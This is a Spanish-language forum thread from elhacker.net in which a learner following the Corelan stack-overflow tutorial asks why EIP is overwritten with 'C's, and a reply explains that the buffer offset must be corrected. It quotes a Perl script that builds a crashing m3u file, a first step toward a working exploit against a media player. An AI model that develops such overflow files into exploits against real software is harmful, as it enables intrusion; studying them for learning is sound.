elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  confusion!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: confusion!  (Leído 3,119 veces)
0x3c

Desconectado Desconectado

Mensajes: 108


learning, making mistakes, having fun


Ver Perfil
confusion!
« en: 11 Enero 2013, 09:49 am »

saludos estoy siguiendo estos tutoriales....

corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

el problema es que cuando llego a la parte que se debe llenar EIP con B's en vez de llenarse con B's se llena con C's...??? estare haciendo algo mal?


por cierto para llenar el EIP con B's en el tutorial aparece este codigo:

Código:
my $file= "eipcrash.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";

por cierto en el codigo que use cambie las letras por sus equivalentes en 'hexadecimal'..


saludos
En línea

Si Vis Pacem, Para Bellum.

Another Legend Has Fallen
ThePinkPanther

Desconectado Desconectado

Mensajes: 82



Ver Perfil
Re: confusion!
« Respuesta #1 en: 26 Enero 2013, 23:54 pm »

saludos estoy siguiendo estos tutoriales....

corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

el problema es que cuando llego a la parte que se debe llenar EIP con B's en vez de llenarse con B's se llena con C's...??? estare haciendo algo mal?


por cierto para llenar el EIP con B's en el tutorial aparece este codigo:

Código:
my $file= "eipcrash.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";

por cierto en el codigo que use cambie las letras por sus equivalentes en 'hexadecimal'..


saludos
Eip se llena con c , porque esta mal la parte del codigo
print $FILE $junk.$eip.$espdata; , en sintaxis esto esta bien , porque llenar llena pero con C , porque no llega $junk al punto justo donde se sobreeescribe eip , fijate el punto justo donde EIP es sobreescrito , y modifica esto :

my $junk= "A" x 26094;

por :  "A" x "EL numero entero justo -1 donde se escribe EIP."

Saludos.


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
duda-confusion
Java
mecosecho 1 2,230 Último mensaje 28 Agosto 2009, 20:06 pm
por egyware
confusion
Desarrollo Web
cker 5 3,002 Último mensaje 14 Noviembre 2011, 21:21 pm
por cker
confusion y duda en placabase-RAM (SOLUCIONADO)
Hardware
noker613 5 6,744 Último mensaje 5 Enero 2012, 23:03 pm
por Aprendiz-Oscuro
Una confusion con Twitter dispara el precio de Tweeter
Noticias
wolfbcn 0 1,640 Último mensaje 5 Octubre 2013, 02:50 am
por wolfbcn
Confusión con el gestor GridBagLayout
Java
marixxaa 1 1,898 Último mensaje 21 Enero 2016, 00:09 am
por 0xFer
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines